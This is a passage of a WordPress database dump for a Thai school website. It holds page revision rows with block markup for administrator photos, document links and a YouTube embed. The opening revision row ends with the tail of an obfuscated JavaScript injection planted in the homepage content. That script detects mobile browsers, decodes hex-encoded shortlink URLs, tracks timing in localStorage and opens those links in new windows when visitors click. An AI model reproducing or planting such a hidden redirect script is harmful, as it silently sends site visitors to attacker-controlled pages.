|_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:13:16','2025-07-15 09:13:16','',19,'http://watprato.ssk.in.th/?p=710',0,'revision','',0),
(711,1,'2025-07-15 16:15:35','2025-07-15 09:15:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid 